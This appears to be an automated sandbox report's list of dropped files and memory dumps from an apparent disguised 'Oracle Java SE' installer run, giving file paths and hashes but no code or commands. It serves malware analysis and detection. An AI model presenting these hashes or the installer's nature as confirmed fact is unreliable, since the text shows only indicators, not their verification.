| SHA256 | e7a9369455a1f1f355faf65b0bb322ffc40741d19df44b2a982cd69f0322709a |
| SHA512 | 8d37b115a91b960ce47504e03bff45ae6bbdf1cec782cf6a69ea348fb91845adda04761a067d26df36ba322b4d784bf7ee2fac76db9cc5334db14e3059d6458c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | e8506a7a82d6d66cb76937576ae2eda7 |
| SHA1 | a3cb771a9a410caaf4e9bb527d02254d41d3169d |
| SHA256 | eb33b432e411b73f127bac67178fd05c9336fcf444973c8e8dcf997fc711bd7d |
| SHA512 | 8eea374485b45af2b50870ee58fd91b7275e050782df5c506e91d3e77c77e68dabf1bbc970d6ddc35a4fc1ea8d4d93900954b64e2303d471354305d2089ae12b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | 7fa35b9b26d35986602214ca1a5a8123 |
| SHA1 | 300297298df1d3bd5b5c0c1c5bb782132bc98df2 |
| SHA256 | 70497b384024f1c0d6950a75f41cfed50292ac8408cd47b47e04b7c375358486 |
| SHA512 | df5edae4399b49fc522a54f5e3cfc287dce17cf3d66103d361f56fd289894dfde258b42266e5837505ef1ea9ab440625129ebfafd41775a32652837014190da6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | d67d0ea2202bf0994c7d74e568bb241d |
| SHA1 | 1aa2f3b799b490e5ec7d538995d7e459094134eb |
| SHA256 | afe0fcf076f4a87deac1a79d1624f7d5bcf2fd79168eb073ddfd8128c77f6802 |
| SHA512 | 48f4ef76389f47ba5404edfad362236185a5edfecb772f520078d1554daab797dac97f432a2367895e81d1da63a8ba3d3c075fca704f55dc9780af300e9e84fb |
C:\Windows\Installer\MSI77C1.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | a27bdbc102aa90a99bc5538bb271b4d3 |
| SHA1 | eb18ea9eee793aa76eab49feea0e6490c4ded61e |
| SHA256 | e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de |
| SHA512 | cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat
| MD5 | 0a16033c7df6ba580e33c66fed1a12d7 |
| SHA1 | 50fc0b9f740a9e82717f2370fe0a15e937a84208 |
| SHA256 | 08d68557b06a5cb43ce2719bf82dd2fee6bd78a58c88a37e5ee5d54b2ea14623 |
| SHA512 | c252e11099d52bc57bd49ce5732a7cd5fcbd155b36e0b0b27a3e8a3023949708362e4156e09f467b35c27543a652173a8dbe29da13dbdb23ecd2354c95569b44 |
memory/1800-84-0x0000000003110000-0x0000000003146000-memory.dmp
memory/5080-85-0x0000000004FB0000-0x00000000055D8000-memory.dmp
memory/2472-86-0x00000000057A0000-0x00000000057C2000-memory.dmp
memory/5080-88-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/5080-87-0x00000000055E0000-0x0000000005646000-memory.dmp
memory/5080-89-0x0000000005870000-0x0000000005BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rixc2b3o.31x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2472-117-0x0000000006870000-0x000000000688E000-memory.dmp
memory/2472-118-0x0000000006890000-0x00000000068DC000-memory.dmp
memory/2472-121-0x0000000070740000-0x000000007078C000-memory.dmp
memory/5080-119-0x0000000006E90000-0x0000000006EC2000-memory.dmp
memory/5080-120-0x0000000070740000-0x000000007078C000-memory.dmp
memory/2472-140-0x0000000006DF0000-0x0000000006E0E000-memory.dmp
memory/5080-141-0x00000000070D0000-0x0000000007173000-memory.dmp
memory/1800-142-0x0000000070740000-0x000000007078C000-memory.dmp
memory/5080-152-0x00000000071F0000-0x000000000720A000-memory.dmp
memory/1800-153-0x0000000008040000-0x00000000086BA000-memory.dmp
memory/5080-154-0x0000000007260000-0x000000000726A000-memory.dmp
memory/1800-155-0x0000000007C90000-0x0000000007D26000-memory.dmp
memory/5080-157-0x00000000073F0000-0x0000000007401000-memory.dmp
memory/1800-156-0x0000000007C00000-0x0000000007C11000-memory.dmp
memory/2472-158-0x0000000007DC0000-0x0000000007DCE000-memory.dmp
memory/5080-159-0x0000000007430000-0x0000000007444000-memory.dmp
memory/5080-160-0x0000000007530000-0x000000000754A000-memory.dmp
memory/1800-161-0x0000000007C80000-0x0000000007C88000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88b7e09ad647110c38f12c0d75b4f5c8 |
| SHA1 | b2e188fd69562cf30374f3d8e4b5f56ff3cd9ca5 |
| SHA256 | 68262db03eb3905e7225b3863eeef9307c5a81a656053706bcca06d8658be296 |
| SHA512 | f9a933492b047d14dcab6a9bd6864b668b36c2ef133bed5ff47ed5b9d59745b172293b96736c71860f64aafd9f44ce1fcffd1ed5b0b7b27b97bd0f05f56192e2 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
memory/1672-192-0x0000000005C10000-0x0000000005F64000-memory.dmp
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | a3ba8128253c2f6bf043d636100d62de |
| SHA1 | f47a211b1d09d75ff820d2c2e2fd9fa0338562a5 |
| SHA256 | 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce |
| SHA512 | 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
memory/4600-280-0x0000000006300000-0x000000000634C000-memory.dmp
memory/548-335-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp
memory/4600-336-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-346-0x00000000074A0000-0x0000000007543000-memory.dmp
memory/1672-347-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/932-367-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/5016-357-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3140-377-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4056-387-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4556-397-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3588-417-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3580-407-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3460-427-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4328-437-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-447-0x00000000077E0000-0x00000000077F1000-memory.dmp
memory/3812-448-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4764-458-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3484-468-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-478-0x0000000007820000-0x0000000007834000-memory.dmp
memory/4420-479-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4016-489-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/2128-499-0x00000000700D0000-0x000000007011C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88e30f8e14dda84b7e420941eb5cfd08 |
| SHA1 | 999c1236d43e908c42e35fdad6a0cbeca0b5c87a |
| SHA256 | b9d45f7479e06d6dcb02482467726fbc43aa738e0605ccc1bd428717fd27c464 |
| SHA512 | a009d8266681fd55714e0fe777f9ca3f4be5c0223971deb886b80582c7398231d22bacd2fd970b3348484b986a081ffa839fdb7454a96a9c6f0fb01ca4eef709 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d835855d729ed0ea8515fc7680f8a68b |
| SHA1 | 5fe84e9ca05c87c5fa0584498a95c3ab9234e446 |
| SHA256 | 767ae12a1249e356d5597ac96c80c4df7bcf696214dca6536e0d750c5ce532c3 |
| SHA512 | 8af7c6179595fd252067f2de18ec4823062951128590a44769477a880c0e14334dc394be85e6ec2ead5bf43936aec34f81447b542081a99a1a32a42082ffe1a3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bc1847cefc1c9c27c95ecd59857d21ac |
| SHA1 | 0c756ee8194aca441ef3d2d24017fa9f20176cb9 |
| SHA256 | 76d940812fbb29a2153bdcf5ca23b6ce4bccca7a0697603823ee32d916f3d9d5 |
| SHA512 | d9110155f8f55a3e4bee18ea12b97a15cfec12fb38ab6c643f36d370e0e123811366476b1217b82b248e5ccc0f5bee98376ca33afd2693d9d34dda3ba5f5c9d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b98526874008796c30f2b4d0d16e0351 |
| SHA1 | 2a4707b0c18155f53c773c0fba8fab4d323c2c6a |
| SHA256 | f62c5b49cbe710a5ef1ccd22ef8a42b380eb2588ae58088ba6fbb1360001ea5f |
| SHA512 | 36f58b3729a07f5cab2f3a2396fdd2fba732a12bc7136104d41d5b6a295b80684259278f891182c9096c84ab095977d1d082e685dfd0d7099dce02cc92ce3ac6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e49232bfd9248f8c4bb9291af3127f26 |
| SHA1 | dee61b7b2713003137e0db037c5c49494c6c4272 |
| SHA256 | 5af059663a12adb9b84cb82ef4520b8b77cce39e50d73bfbe0325babe79d16b8 |
| SHA512 | a248b49b18c26b614313f94d067cd61965dadb105163f5812557aac467ba39752d629b24c6493c914c7a463a1d23fbdaa331ff4a1d798974a51ac30dc274a0f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 90de5738b9e946ce68a2d67e66b45f58 |
| SHA1 | 15ab9e70b2da772985ba674513ff40251b62799e |
| SHA256 | 227fc3c051f3b3dd07bde413f195d701b63a627965c2003d55b8d3ddef950bdc |
| SHA512 | 98bbc30ab336b5e1e85ae108e518b3e598859f1033a3a8ae07340fb14f89af02cf52e9a06d281341eaebe47ff6ea16d50e35b306fb398684a3788ae97bf2299c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 92d7d23566905f49a00fe9bd39dd8426 |
| SHA1 | 83cfc3f1449b54d21cbdd394723ca4e6a4b6a355 |
| SHA256 | 9eb45000e73503d1ba9b2af51e5216f82b92321b03c2150b5a7f85fbd6f8ef3f |
| SHA512 | c47d257a916028a2e137446ae3429337eafc69056504006cb0b9d298feedd19b974eb2c88f02e17dc2119d6bd0f2c1f9bc11d8a022875a9c573f344dcfa73d3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6eef5e45356ecff70dbfaf70af0c41a4 |
| SHA1 | e7bfa64975d94696213799d7aa630739ef9fed68 |
| SHA256 | 683670fb625bcdd08dbfde6ed96440363959a632bf6249b3853de37620bc5555 |
| SHA512 | d00498eb7b198bfa0a1528ad8572b46839413681516a3929929a7af122b870d115dd49edc1d77cf19a95683ea6a0e1cacdeabebecfaec0ac105928886874cab0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f853d6d0fe869dc52d9c5d7873c8219c |
| SHA1 | 2805083671f9bc4453de07781d737a5bf45e60e5 |
| SHA256 | 66945f8b460f9025d5f58ca90bd8b976d41c2f42cba58845feaa78643cefbbec |
| SHA512 | 4fcf31aa3a393d9c0ee7dc08bfa3c62bf0862bea1f88b0f3a2286f5293e9e9ed5eeb9a9896f1251fa641080c6ad918b1d2e4e5c0d21b3cc1b94c0b7ed650bd0e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 82111a2f1b6833e37602df207a7bc189 |
| SHA1 | 19ced181f471d749cc98a303685558bd284155d9 |
| SHA256 | a79ba5594439c89db758b486786fc0420184e5f8ec304407173a5dad80aaea46 |
| SHA512 | b602b8e53b156d157ad288a12c6d5eba950f5907ea76b4fad6952f27867c2a2118c51c501e0ad1f0477dd07842b989435dc676490bea9bafdcbe9359ee77af97 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d63604e13936ee1e7baa922de6e2524f |
| SHA1 | 619478385fb76193a111ea5e2cbda66ea88494bf |
| SHA256 | 705e89249150d5cd31bc3b8f5b59527c4962b575d6dedc6429f2f52e2b9d76fe |
| SHA512 | ce64bf0cf7d2660a6e3b344e7176e74c44c12434fbe35ddf764b6980cf38c0222cb8afca1a44a4b1ad78274f263a5404d219cecebab6a194e5b9a382f568c367 |
C:\Config.Msi\e57762b.rbs
| MD5 | 3064ebd622bb0cec063dfec93c469a92 |
| SHA1 | 5cc25618f16e07a21ff01422bd63fb2d66ef560c |
| SHA256 | de11bf9c53921ba2f588cf9e9808b01761b2a5b03de2dbae238dc04fa7e8a7f2 |
| SHA512 | 322693566aa5ac5afcd1dc0ecb19787df102e86076d84133c1067896fade6c7d0be92bb7b602a1466124ec67faeef267a8ccaadbf93b41b2c7acb0ae690d102b |
C:\Windows\Installer\e57762a.msi
| MD5 | 4c11285fc4be4ffa97a866fbc13bbd83 |
| SHA1 | 67230603c53081c6436658c3e7b90048a61cb5ed |
| SHA256 | f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9 |
| SHA512 | 4f8654d49aa571890473ffb4743dbeee311efbbec09fec307fbcf4803041c976dde0711a72865820edbc5b94487609622adbd9d7694dc8394eee44a5821ef4e1 |
memory/548-551-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp